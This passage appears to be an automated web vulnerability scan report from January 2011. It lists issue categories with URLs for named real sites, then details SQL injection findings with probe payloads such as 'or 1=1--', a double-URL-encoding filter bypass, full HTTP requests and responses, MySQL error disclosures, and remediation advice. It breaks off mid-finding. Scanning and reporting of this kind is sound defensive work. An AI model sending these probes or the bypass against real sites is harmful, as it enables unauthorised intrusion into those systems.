16.167. http://www.wired.com/threatlevel/category/the-ridiculous/

16.168. http://www.wired.com/threatlevel/category/threats/

16.169. http://www.wired.com/threatlevel/category/three-strikes/

16.170. http://www.wired.com/threatlevel/category/tsa/

16.171. http://www.wired.com/threatlevel/category/uncategorized/

16.172. http://www.wired.com/threatlevel/category/watchlists/

16.173. http://www.wired.com/threatlevel/category/wikileaks/

16.174. http://www.wired.com/threatlevel/category/yo-ho-ho/

16.175. http://www.wired.com/threatlevel/tag/4chan/

16.176. http://www.wired.com/threatlevel/tag/aclu/

16.177. http://www.wired.com/threatlevel/tag/al-haramain/

16.178. http://www.wired.com/threatlevel/tag/albert-gonzalez/

16.179. http://www.wired.com/threatlevel/tag/apple-iphone/

16.180. http://www.wired.com/threatlevel/tag/blackhat/

16.181. http://www.wired.com/threatlevel/tag/bradley-manning/

16.182. http://www.wired.com/threatlevel/tag/carding/

16.183. http://www.wired.com/threatlevel/tag/ccc/

16.184. http://www.wired.com/threatlevel/tag/censorship/

16.185. http://www.wired.com/threatlevel/tag/china/

16.186. http://www.wired.com/threatlevel/tag/copyright/

16.187. http://www.wired.com/threatlevel/tag/crime/

16.188. http://www.wired.com/threatlevel/tag/defcon/

16.189. http://www.wired.com/threatlevel/tag/dmca/

16.190. http://www.wired.com/threatlevel/tag/facebook/

16.191. http://www.wired.com/threatlevel/tag/fbi/

16.192. http://www.wired.com/threatlevel/tag/file-sharing/

16.193. http://www.wired.com/threatlevel/tag/first-amendment/

16.194. http://www.wired.com/threatlevel/tag/google/

16.195. http://www.wired.com/threatlevel/tag/hack/

16.196. http://www.wired.com/threatlevel/tag/hacking/

16.197. http://www.wired.com/threatlevel/tag/intellectual-property/

16.198. http://www.wired.com/threatlevel/tag/mpaa/

16.199. http://www.wired.com/threatlevel/tag/nsa/

16.200. http://www.wired.com/threatlevel/tag/obama/

16.201. http://www.wired.com/threatlevel/tag/piracy/

16.202. http://www.wired.com/threatlevel/tag/pirate-bay-trial/

16.203. http://www.wired.com/threatlevel/tag/pirate-bay/

16.204. http://www.wired.com/threatlevel/tag/politics/

16.205. http://www.wired.com/threatlevel/tag/privacy/

16.206. http://www.wired.com/threatlevel/tag/riaa/

16.207. http://www.wired.com/threatlevel/tag/segvec/

16.208. http://www.wired.com/threatlevel/tag/supreme-court/

16.209. http://www.wired.com/threatlevel/tag/surveillance/

16.210. http://www.wired.com/threatlevel/tag/tjx/

16.211. http://www.wired.com/threatlevel/tag/tsa/

16.212. http://www.wired.com/threatlevel/tag/twitter/

16.213. http://www.wired.com/threatlevel/tag/virginia-tech-shootings/

16.214. http://www.wired.com/threatlevel/tag/wikileaks/

16.215. http://www.wired.com/topics/Claude_Cassirer

16.216. http://www.wired.com/topics/Florida

16.217. http://www.wired.com/topics/Spain

16.218. http://www.wired.com/topics/United_States

16.219. http://www.wired.com/topics/Western_Europe

16.220. http://www.wired.com/topics/WikiLeaks.org

16.221. http://www.wired.com/underwire/

16.222. http://www.wired.com/video/

16.223. http://www.wired.com/video/search/

16.224. http://www.wired.com/wiredscience/

16.225. http://www.zdnet.com/

17. TRACE method is enabled

17.1. http://ad.crwdcntrl.net/

17.2. http://www.sentinelinvestments.com/

17.3. http://www.washingtonpost.com/

17.4. http://www.websitedescription.com/

18. Email addresses disclosed

18.1. http://dean.edwards.name/weblog/2006/03/base/

18.2. http://landesm.gfi.com/event-log-analysis-sm/

18.3. http://lists.arin.net/mailman/listinfo/arin-whoisrws

18.4. http://www.ccmaine.net/ContactUs

18.5. http://www.pwc.com/WTS/WebTrendsServlet.js

18.6. http://www.pwc.com/en_GX/webadmin/assets/script/activatedlogo.js

18.7. http://www.sentinelinvestments.com/inc/js/jquery.cookie.js

18.8. http://www.sentinelinvestments.com/inc/js/jquery.hoverIntent.minified.js

18.9. http://www.sentinelinvestments.com/inc/js/jquery.tablesorter.js

18.10. http://www.sentinelinvestments.com/inc/js/lightbox/scripts/prototype.js

18.11. http://www.tukui.org/v2/tukloadx-mac-os-auto-update/

18.12. http://www.tukui.org/v2/tukui/contact/

18.13. http://www.wired.com/about/faq/

18.14. http://www.wired.com/about/press/

18.15. http://www.wired.com/about/privacy-policy/

18.16. http://www.wired.com/about/user-agreement/

18.17. http://www.wired.com/autopia/

18.18. http://www.wired.com/autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/

18.19. http://www.wired.com/dangerroom/

18.20. http://www.wired.com/dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/

18.21. http://www.wired.com/epicenter/

18.22. http://www.wired.com/epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/

18.23. http://www.wired.com/epicenter/2011/01/metropcs-net-neutrality/

18.24. http://www.wired.com/gadgetlab/

18.25. http://www.wired.com/gamelife/

18.26. http://www.wired.com/geekdad/

18.27. http://www.wired.com/geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/

18.28. http://www.wired.com/js/videos/MobileCompatibility.js

18.29. http://www.wired.com/magazine/decode/

18.30. http://www.wired.com/playbook/

18.31. http://www.wired.com/rawfile/

18.32. http://www.wired.com/thisdayintech/

18.33. http://www.wired.com/threatlevel/

18.34. http://www.wired.com/threatlevel/2006/04/reporter_vs_sub/

18.35. http://www.wired.com/threatlevel/2010/12/hacking-the-hacker-stereotypes/

18.36. http://www.wired.com/threatlevel/2010/12/transcending-the-human-diy-style/

18.37. http://www.wired.com/threatlevel/2010/12/wiki-style-mapping-heads-to-sea/

18.38. http://www.wired.com/threatlevel/2011/01/birgitta-jonsdottir/

18.39. http://www.wired.com/threatlevel/2011/01/codebreakers-death/

18.40. http://www.wired.com/threatlevel/2011/01/dubai-assassination/

18.41. http://www.wired.com/threatlevel/2011/01/secret-tanning-camera/

18.42. http://www.wired.com/threatlevel/2011/01/vf-wikieaks/

18.43. http://www.wired.com/threatlevel/2011/01/video-poker/

18.44. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/

18.45. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/&hl=en&client=ca-pub-9817987453265044&adU=Verizon.com&adT=Verizon+Internet+-+%2419.99&adU=www.Brocade.com&adT=Ethernet+Fabrics&adU=www.Comcast.com&adT=Comcast%C2%AE+High+Speed&adU=www.google.com/nexus&adT=The+New+Google+Nexus+S&gl=US/x26usg/x3dAFQjCNGTF4DW2TDGEnchvTvU-Xc_zM5wgQ

18.46. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/&t=WikiLeaks%20Cables%20Cited%20in%20Lawsuit%20Over%20$500%20Million%20Sunken%20Treasure

18.47. http://www.wired.com/threatlevel/author/kimzetter/

18.48. http://www.wired.com/threatlevel/category/announcements/

18.49. http://www.wired.com/threatlevel/category/atm-hacking/

18.50. http://www.wired.com/threatlevel/category/bittorrent/

18.51. http://www.wired.com/threatlevel/category/black-hat-conference/

18.52. http://www.wired.com/threatlevel/category/bradley-manning/

18.53. http://www.wired.com/threatlevel/category/breaches/

18.54. http://www.wired.com/threatlevel/category/censorship/

18.55. http://www.wired.com/threatlevel/category/chaos-computer-club/

18.56. http://www.wired.com/threatlevel/category/conferences/

18.57. http://www.wired.com/threatlevel/category/copyrights-and-patents/

18.58. http://www.wired.com/threatlevel/category/coverups/

18.59. http://www.wired.com/threatlevel/category/crime/

18.60. http://www.wired.com/threatlevel/category/crypto/

18.61. http://www.wired.com/threatlevel/category/cybarmageddon/

18.62. http://www.wired.com/threatlevel/category/cyber-warfare/

18.63. http://www.wired.com/threatlevel/category/cyberbullying/

18.64. http://www.wired.com/threatlevel/category/cybersecurity/

18.65. http://www.wired.com/threatlevel/category/defcon/

18.66. http://www.wired.com/threatlevel/category/digital-millennium-copyright-act/

18.67. http://www.wired.com/threatlevel/category/e-voting/

18.68. http://www.wired.com/threatlevel/category/elections/

18.69. http://www.wired.com/threatlevel/category/fed-blotter/

18.70. http://www.wired.com/threatlevel/category/glitches-and-bugs/

18.71. http://www.wired.com/threatlevel/category/hacks-and-cracks/

18.72. http://www.wired.com/threatlevel/category/hans-reiser-trial/

18.73. http://www.wired.com/threatlevel/category/identification/

18.74. http://www.wired.com/threatlevel/category/intellectual-property/

18.75. http://www.wired.com/threatlevel/category/lori-drew-trial/

18.76. http://www.wired.com/threatlevel/category/network-neutrality/

18.77. http://www.wired.com/threatlevel/category/nsa/

18.78. http://www.wired.com/threatlevel/category/openleaks/

18.79. http://www.wired.com/threatlevel/category/politics/

18.80. http://www.wired.com/threatlevel/category/porn/

18.81. http://www.wired.com/threatlevel/category/privacy/

18.82. http://www.wired.com/threatlevel/category/rfid/

18.83. http://www.wired.com/threatlevel/category/riaa-litigation/

18.84. http://www.wired.com/threatlevel/category/rsa-conference/

18.85. http://www.wired.com/threatlevel/category/sexting/

18.86. http://www.wired.com/threatlevel/category/spooks-gone-wild/

18.87. http://www.wired.com/threatlevel/category/stuxnet/

18.88. http://www.wired.com/threatlevel/category/sunshine-and-secrecy/

18.89. http://www.wired.com/threatlevel/category/surveillance/

18.90. http://www.wired.com/threatlevel/category/the-courts/

18.91. http://www.wired.com/threatlevel/category/the-ridiculous/

18.92. http://www.wired.com/threatlevel/category/threats/

18.93. http://www.wired.com/threatlevel/category/three-strikes/

18.94. http://www.wired.com/threatlevel/category/tsa/

18.95. http://www.wired.com/threatlevel/category/uncategorized/

18.96. http://www.wired.com/threatlevel/category/watchlists/

18.97. http://www.wired.com/threatlevel/category/wikileaks/

18.98. http://www.wired.com/threatlevel/category/yo-ho-ho/

18.99. http://www.wired.com/threatlevel/tag/4chan/

18.100. http://www.wired.com/threatlevel/tag/aclu/

18.101. http://www.wired.com/threatlevel/tag/al-haramain/

18.102. http://www.wired.com/threatlevel/tag/albert-gonzalez/

18.103. http://www.wired.com/threatlevel/tag/apple-iphone/

18.104. http://www.wired.com/threatlevel/tag/blackhat/

18.105. http://www.wired.com/threatlevel/tag/bradley-manning/

18.106. http://www.wired.com/threatlevel/tag/carding/

18.107. http://www.wired.com/threatlevel/tag/ccc/

18.108. http://www.wired.com/threatlevel/tag/censorship/

18.109. http://www.wired.com/threatlevel/tag/china/

18.110. http://www.wired.com/threatlevel/tag/copyright/

18.111. http://www.wired.com/threatlevel/tag/crime/

18.112. http://www.wired.com/threatlevel/tag/defcon/

18.113. http://www.wired.com/threatlevel/tag/dmca/

18.114. http://www.wired.com/threatlevel/tag/facebook/

18.115. http://www.wired.com/threatlevel/tag/fbi/

18.116. http://www.wired.com/threatlevel/tag/file-sharing/

18.117. http://www.wired.com/threatlevel/tag/first-amendment/

18.118. http://www.wired.com/threatlevel/tag/google/

18.119. http://www.wired.com/threatlevel/tag/hack/

18.120. http://www.wired.com/threatlevel/tag/hacking/

18.121. http://www.wired.com/threatlevel/tag/intellectual-property/

18.122. http://www.wired.com/threatlevel/tag/mpaa/

18.123. http://www.wired.com/threatlevel/tag/nsa/

18.124. http://www.wired.com/threatlevel/tag/obama/

18.125. http://www.wired.com/threatlevel/tag/piracy/

18.126. http://www.wired.com/threatlevel/tag/pirate-bay-trial/

18.127. http://www.wired.com/threatlevel/tag/pirate-bay/

18.128. http://www.wired.com/threatlevel/tag/politics/

18.129. http://www.wired.com/threatlevel/tag/privacy/

18.130. http://www.wired.com/threatlevel/tag/riaa/

18.131. http://www.wired.com/threatlevel/tag/segvec/

18.132. http://www.wired.com/threatlevel/tag/supreme-court/

18.133. http://www.wired.com/threatlevel/tag/surveillance/

18.134. http://www.wired.com/threatlevel/tag/tjx/

18.135. http://www.wired.com/threatlevel/tag/tsa/

18.136. http://www.wired.com/threatlevel/tag/twitter/

18.137. http://www.wired.com/threatlevel/tag/virginia-tech-shootings/

18.138. http://www.wired.com/threatlevel/tag/wikileaks/

18.139. http://www.wired.com/underwire/

18.140. http://www.wired.com/wiredscience/

19. Private IP addresses disclosed

19.1. http://digg.com/submit

19.2. http://download.cnet.com/8301-2007_4-20027809-12.html/

19.3. http://download.cnet.com/8618-2007_4-20027809.html

19.4. http://www.zdnet.com/

20. Robots.txt file

20.1. http://ad.crwdcntrl.net/4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json

20.2. http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel

20.3. http://ad.uk.doubleclick.net/adj/reg.misc.4159/textlink

20.4. http://adlog.com.com/adlog/i/r=10004&sg=484676&o=20%253a2007%253aB12%253a2014%253a&h=cn&p=2&b=6&l=en_US&site=4&pt=8301&nd=2007&pid=&cid=20027809&pp=100&e=3&rqid=01phx1-ad-e18:4D29F45D3ECF7C&orh=packetstormsecurity.org&ort=&oepartner=&epartner=&ppartner=&pdom=packetstormsecurity.org&cpnmodule=&count=&ra=173.193.214.243&dvar=dvar%255flb%255fmpu%253d1%2523dvar%255ftag%253dSmart%2520Protection%253bparental%2520control%253bTrend%2520Micro%2523dvar%255fversion%253d2008&ucat_rsi=%2526&pg=8WzIBQoOYJAAADD4JyUAAADs&t=2011.01.09.21.57.52/http://i.i.com.com/cnwk.1d/Ads/11732/10/728x90righteousSD123.gif

20.5. http://b.scorecardresearch.com/b

20.6. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp

20.7. http://www.pwc.com/us/en/issues/cloud-computing/index.jhtml

20.8. http://www.walmart.com/x22

20.9. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw

20.10. http://www.websitedescription.com/msn.whitepages.com

21. HTML does not specify charset

21.1. http://ad.doubleclick.net/clk

21.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs

21.3. http://www.pwc.com/WTS/WebTrendsServlet.js

21.4. http://www.tukui.org/v2/forums/search/

21.5. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354

21.6. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw

22. Content type incorrectly stated

22.1. http://ad.doubleclick.net/clk

22.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs

22.3. http://darkblue.com/skins/lander/images/darkblue.ico

22.4. http://www.pwc.com/WTS/WebTrendsServlet.js

22.5. http://www.sentinelinvestments.com/favicon.ico

22.6. http://www.wired.com/js/ads/google_customize.js

22.7. http://www.wired.com/js/cn-fe-ads/cn.ad.lotame.js

22.8. http://www.wired.com/js/cn-fe-ads/cn.dart.js

22.9. http://www.wired.com/js/cn-fe-common/cn.js

22.10. http://www.wired.com/js/comments/commentBroker.js

22.11. http://www.wired.com/js/comments/prototype.js

22.12. http://www.wired.com/js/ecom/ecomfw.min.js

22.13. http://www.wired.com/js/global.js

22.14. http://www.wired.com/js/jquery-1.3.2.min.js

22.15. http://www.wired.com/js/omniture/s_code.js

22.16. http://www.wired.com/js/videos/MobileCompatibility.js

22.17. http://www.wired.com/js_blogs/json2.js

22.18. http://www.wired.com/js_blogs/popup.js

22.19. http://www.wired.com/threatlevel/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

22.20. http://www.wired.com/threatlevel/xmlrpc.php

23. SSL certificate



1. SQL injection  next
There are 9 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/wiredcom.dart/threatlevel

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 31736172%20or%201%3d1--%20 and 31736172%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adj/wiredcom.dart/threatlevel?131736172%20or%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 455
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:24:37 GMT
Expires: Wed, 12 Jan 2011 15:24:37 GMT
Connection: close

document.write('<!-- Template ID = 2050 Template Name = CONDE HTML for GIF and JPG -->\n\n<a href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3a8d/3/0/%2a/b%3B232847109%3B0-0%3B0%3B16638913%3B255-0/0%3B39450345/39468132/1%3B%3B%7Eaopt%3D2/0/6c/0%3B%7Esscs%3D%3fhttp://www.concierge.com/tools/travelawards/readerschoice?mbid=house\" target=\"_blank\"><img src=\"http://s0.2mdn.net/2646754/CON_2010RC_728x90_.jpg\" WIDTH=728 HEIGHT=90 border=\"0\"></a>\n');

Request 2

GET /adj/wiredcom.dart/threatlevel?131736172%20or%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 417
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:24:37 GMT
Expires: Wed, 12 Jan 2011 15:24:37 GMT
Connection: close

document.write('<!-- Template ID = 2050 Template Name = CONDE HTML for GIF and JPG -->\n\n<a href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3a8d/3/0/%2a/q%3B224881053%3B0-0%3B0%3B16638913%3B255-0/0%3B39745831/39763618/1%3B%3B%7Eaopt%3D2/0/6c/0%3B%7Esscs%3D%3fhttp://www.vf.com/app\" target=\"_blank\"><img src=\"http://s0.2mdn.net/2646749/VYF_ROS_728x90_JanApp_v3a-1.gif\" WIDTH=728 HEIGHT=90 border=\"0\"></a>\n');

1.2. http://ad.uk.doubleclick.net/adj/reg.security.4159/front [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.uk.doubleclick.net
Path:   /adj/reg.security.4159/front

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adj/reg.security.4159/front%2527;tile=1;dcove=d;cta=0;ctb=0;ctc=redesign;sc=1;cid=;test=;pid=111484;pf=0;kw=open%20source;kw=encryption;kw=cryptography;kw=software;kw=export%20administration%20regulations;kw=bureau%20of%20industry%20and%20security;cp=0;vc=sec.front;pos=top;dcopt=ist;sz=728x90;ord=671761913? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 12 Jan 2011 15:26:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4540

document.write('<!-- Template Id = 1 Template Name = Banner Creative (Flash) -->\n<!-- Copyright 2002 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.j
...[SNIP]...
mage();
ML_img_ServerOnline.src='http://invitation.opinionbar.com/popups/ServerOnline.gif';
ML_img_ServerOnline.onload=ML_ImageLoaded;
ML_img_ServerOnline.onabort=ML_ImageLoaded;
ML_img_ServerOnline.onerror=ML_ImageError;

function ML_ImageLoaded()
{
function metrixlab_onready(el, func){
   this.args = new Array(el, func);
   this.doTry = function(){
       try{
           var el = eval(this.args[0]);
           el.onload =
...[SNIP]...

Request 2

GET /adj/reg.security.4159/front%2527%2527;tile=1;dcove=d;cta=0;ctb=0;ctc=redesign;sc=1;cid=;test=;pid=111484;pf=0;kw=open%20source;kw=encryption;kw=cryptography;kw=software;kw=export%20administration%20regulations;kw=bureau%20of%20industry%20and%20security;cp=0;vc=sec.front;pos=top;dcopt=ist;sz=728x90;ord=671761913? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 12 Jan 2011 15:27:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 3471

document.write('<a target="_blank" href="http://ad.uk.doubleclick.net/click;h=v8/3a8d/0/0/%2a/d;207832120;0-0;0;13489543;3454-728/90;29868129/29886006/1;;~sscs=%3fhttp://account.theregister.co.uk/regi
...[SNIP]...

1.3. http://www.sentinelinvestments.com/forms_literature.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sentinelinvestments.com
Path:   /forms_literature.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /forms_literature.php/1' HTTP/1.1
Host: www.sentinelinvestments.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=22150713.1294754867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qmis707mdaq9bcgqjvjtrnmke6; __utma=22150713.441323346.1294754867.1294754867.1294754867.1; __utmc=22150713; __utmb=22150713.4.10.1294754867;

Response

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 16:05:34 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 150
Connection: close
Content-Type: text/html; charset=UTF-8

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

1.4. http://www.sentinelinvestments.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sentinelinvestments.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php/1' HTTP/1.1
Host: www.sentinelinvestments.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=22150713.1294754867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qmis707mdaq9bcgqjvjtrnmke6; __utma=22150713.441323346.1294754867.1294754867.1294754867.1; __utmc=22150713; __utmb=22150713.4.10.1294754867;

Response 1

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 16:05:22 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 150
Connection: close
Content-Type: text/html; charset=UTF-8

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

Request 2

GET /index.php/1'' HTTP/1.1
Host: www.sentinelinvestments.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=22150713.1294754867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qmis707mdaq9bcgqjvjtrnmke6; __utma=22150713.441323346.1294754867.1294754867.1294754867.1; __utmc=22150713; __utmb=22150713.4.10.1294754867;

Response 2

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 16:05:23 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head>
   <l
...[SNIP]...

1.5. http://www.sentinelinvestments.com/sentinel_news_detail.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sentinelinvestments.com
Path:   /sentinel_news_detail.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /sentinel_news_detail.php/1' HTTP/1.1
Host: www.sentinelinvestments.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=22150713.1294754867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qmis707mdaq9bcgqjvjtrnmke6; __utma=22150713.441323346.1294754867.1294754867.1294754867.1; __utmc=22150713; __utmb=22150713.4.10.1294754867;

Response

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 16:04:42 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 150
Connection: close
Content-Type: text/html; charset=UTF-8

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

1.6. http://www.websitedescription.com/msn.whitepages.com [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.websitedescription.com
Path:   /msn.whitepages.com

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

